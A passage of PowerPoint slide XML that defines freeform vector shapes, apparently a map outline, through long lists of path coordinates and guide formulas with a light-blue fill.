                      <a:pt x="120" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="448"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="466"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="131"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36128" name="Freeform 261"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2914" y="1415"/>
                <a:ext cx="205" cy="473"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 193 w 205"/>
                  <a:gd name="T1" fmla="*/ 136 h 473"/>
                  <a:gd name="T2" fmla="*/ 177 w 205"/>
                  <a:gd name="T3" fmla="*/ 134 h 473"/>
                  <a:gd name="T4" fmla="*/ 163 w 205"/>
                  <a:gd name="T5" fmla="*/ 153 h 473"/>
                  <a:gd name="T6" fmla="*/ 157 w 205"/>
                  <a:gd name="T7" fmla="*/ 172 h 473"/>
                  <a:gd name="T8" fmla="*/ 159 w 205"/>
                  <a:gd name="T9" fmla="*/ 190 h 473"/>
                  <a:gd name="T10" fmla="*/ 137 w 205"/>
                  <a:gd name="T11" fmla="*/ 220 h 473"/>
                  <a:gd name="T12" fmla="*/ 123 w 205"/>
                  <a:gd name="T13" fmla="*/ 229 h 473"/>
                  <a:gd name="T14" fmla="*/ 110 w 205"/>
                  <a:gd name="T15" fmla="*/ 242 h 473"/>
                  <a:gd name="T16" fmla="*/ 99 w 205"/>
                  <a:gd name="T17" fmla="*/ 253 h 473"/>
                  <a:gd name="T18" fmla="*/ 97 w 205"/>
                  <a:gd name="T19" fmla="*/ 280 h 473"/>
                  <a:gd name="T20" fmla="*/ 100 w 205"/>
                  <a:gd name="T21" fmla="*/ 309 h 473"/>
                  <a:gd name="T22" fmla="*/ 109 w 205"/>
                  <a:gd name="T23" fmla="*/ 315 h 473"/>
                  <a:gd name="T24" fmla="*/ 125 w 205"/>
                  <a:gd name="T25" fmla="*/ 336 h 473"/>
                  <a:gd name="T26" fmla="*/ 121 w 205"/>
                  <a:gd name="T27" fmla="*/ 347 h 473"/>
                  <a:gd name="T28" fmla="*/ 106 w 205"/>
                  <a:gd name="T29" fmla="*/ 352 h 473"/>
                  <a:gd name="T30" fmla="*/ 90 w 205"/>
                  <a:gd name="T31" fmla="*/ 348 h 473"/>
                  <a:gd name="T32" fmla="*/ 95 w 205"/>
                  <a:gd name="T33" fmla="*/ 354 h 473"/>
                  <a:gd name="T34" fmla="*/ 104 w 205"/>
                  <a:gd name="T35" fmla="*/ 356 h 473"/>
                  <a:gd name="T36" fmla="*/ 116 w 205"/>
                  <a:gd name="T37" fmla="*/ 353 h 473"/>
                  <a:gd name="T38" fmla="*/ 120 w 205"/>
                  <a:gd name="T39" fmla="*/ 354 h 473"/>
                  <a:gd name="T40" fmla="*/ 111 w 205"/>
                  <a:gd name="T41" fmla="*/ 363 h 473"/>
                  <a:gd name="T42" fmla="*/ 107 w 205"/>
                  <a:gd name="T43" fmla="*/ 365 h 473"/>
                  <a:gd name="T44" fmla="*/ 100 w 205"/>
                  <a:gd name="T45" fmla="*/ 373 h 473"/>
                  <a:gd name="T46" fmla="*/ 86 w 205"/>
                  <a:gd name="T47" fmla="*/ 376 h 473"/>
                  <a:gd name="T48" fmla="*/ 90 w 205"/>
                  <a:gd name="T49" fmla="*/ 398 h 473"/>
                  <a:gd name="T50" fmla="*/ 89 w 205"/>
                  <a:gd name="T51" fmla="*/ 405 h 473"/>
                  <a:gd name="T52" fmla="*/ 85 w 205"/>
                  <a:gd name="T53" fmla="*/ 422 h 473"/>
                  <a:gd name="T54" fmla="*/ 74 w 205"/>
                  <a:gd name="T55" fmla="*/ 451 h 473"/>
                  <a:gd name="T56" fmla="*/ 57 w 205"/>
                  <a:gd name="T57" fmla="*/ 454 h 473"/>
                  <a:gd name="T58" fmla="*/ 52 w 205"/>
                  <a:gd name="T59" fmla="*/ 467 h 473"/>
                  <a:gd name="T60" fmla="*/ 36 w 205"/>
                  <a:gd name="T61" fmla="*/ 473 h 473"/>
                  <a:gd name="T62" fmla="*/ 29 w 205"/>
                  <a:gd name="T63" fmla="*/ 466 h 473"/>
                  <a:gd name="T64" fmla="*/ 22 w 205"/>
                  <a:gd name="T65" fmla="*/ 446 h 473"/>
                  <a:gd name="T66" fmla="*/ 29 w 205"/>
                  <a:gd name="T67" fmla="*/ 439 h 473"/>
                  <a:gd name="T68" fmla="*/ 20 w 205"/>
                  <a:gd name="T69" fmla="*/ 428 h 473"/>
                  <a:gd name="T70" fmla="*/ 12 w 205"/>
                  <a:gd name="T71" fmla="*/ 405 h 473"/>
                  <a:gd name="T72" fmla="*/ 9 w 205"/>
                  <a:gd name="T73" fmla="*/ 388 h 473"/>
                  <a:gd name="T74" fmla="*/ 2 w 205"/>
                  <a:gd name="T75" fmla="*/ 369 h 473"/>
                  <a:gd name="T76" fmla="*/ 6 w 205"/>
                  <a:gd name="T77" fmla="*/ 369 h 473"/>
                  <a:gd name="T78" fmla="*/ 13 w 205"/>
                  <a:gd name="T79" fmla="*/ 344 h 473"/>
                  <a:gd name="T80" fmla="*/ 22 w 205"/>
                  <a:gd name="T81" fmla="*/ 325 h 473"/>
                  <a:gd name="T82" fmla="*/ 25 w 205"/>
                  <a:gd name="T83" fmla="*/ 300 h 473"/>
                  <a:gd name="T84" fmla="*/ 17 w 205"/>
                  <a:gd name="T85" fmla="*/ 278 h 473"/>
                  <a:gd name="T86" fmla="*/ 18 w 205"/>
                  <a:gd name="T87" fmla="*/ 222 h 473"/>
                  <a:gd name="T88" fmla="*/ 33 w 205"/>
                  <a:gd name="T89" fmla="*/ 200 h 473"/>
                  <a:gd name="T90" fmla="*/ 50 w 205"/>
                  <a:gd name="T91" fmla="*/ 194 h 473"/>
                  <a:gd name="T92" fmla="*/ 46 w 205"/>
                  <a:gd name="T93" fmla="*/ 169 h 473"/>
                  <a:gd name="T94" fmla="*/ 56 w 205"/>
                  <a:gd name="T95" fmla="*/ 125 h 473"/>
                  <a:gd name="T96" fmla="*/ 78 w 205"/>
                  <a:gd name="T97" fmla="*/ 97 h 473"/>
                  <a:gd name="T98" fmla="*/ 82 w 205"/>
                  <a:gd name="T99" fmla="*/ 71 h 473"/>
                  <a:gd name="T100" fmla="*/ 104 w 205"/>
                  <a:gd name="T101" fmla="*/ 48 h 473"/>
                  <a:gd name="T102" fmla="*/ 112 w 205"/>
                  <a:gd name="T103" fmla="*/ 26 h 473"/>
                  <a:gd name="T104" fmla="*/ 137 w 205"/>
                  <a:gd name="T105" fmla="*/ 35 h 473"/>
                  <a:gd name="T106" fmla="*/ 145 w 205"/>
                  <a:gd name="T107" fmla="*/ 1 h 473"/>
                  <a:gd name="T108" fmla="*/ 156 w 205"/>
                  <a:gd name="T109" fmla="*/ 3 h 473"/>
                  <a:gd name="T110" fmla="*/ 189 w 205"/>
                  <a:gd name="T111" fmla="*/ 34 h 473"/>
                  <a:gd name="T112" fmla="*/ 197 w 205"/>
                  <a:gd name="T113" fmla="*/ 67 h 473"/>
                  <a:gd name="T114" fmla="*/ 200 w 205"/>
                  <a:gd name="T115" fmla="*/ 112 h 473"/>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205"/>
                  <a:gd name="T175" fmla="*/ 0 h 473"/>
                  <a:gd name="T176" fmla="*/ 205 w 205"/>
                  <a:gd name="T177" fmla="*/ 473 h 473"/>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205" h="473">
                    <a:moveTo>
                      <a:pt x="205" y="131"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="203" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="353"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="353"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="448"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
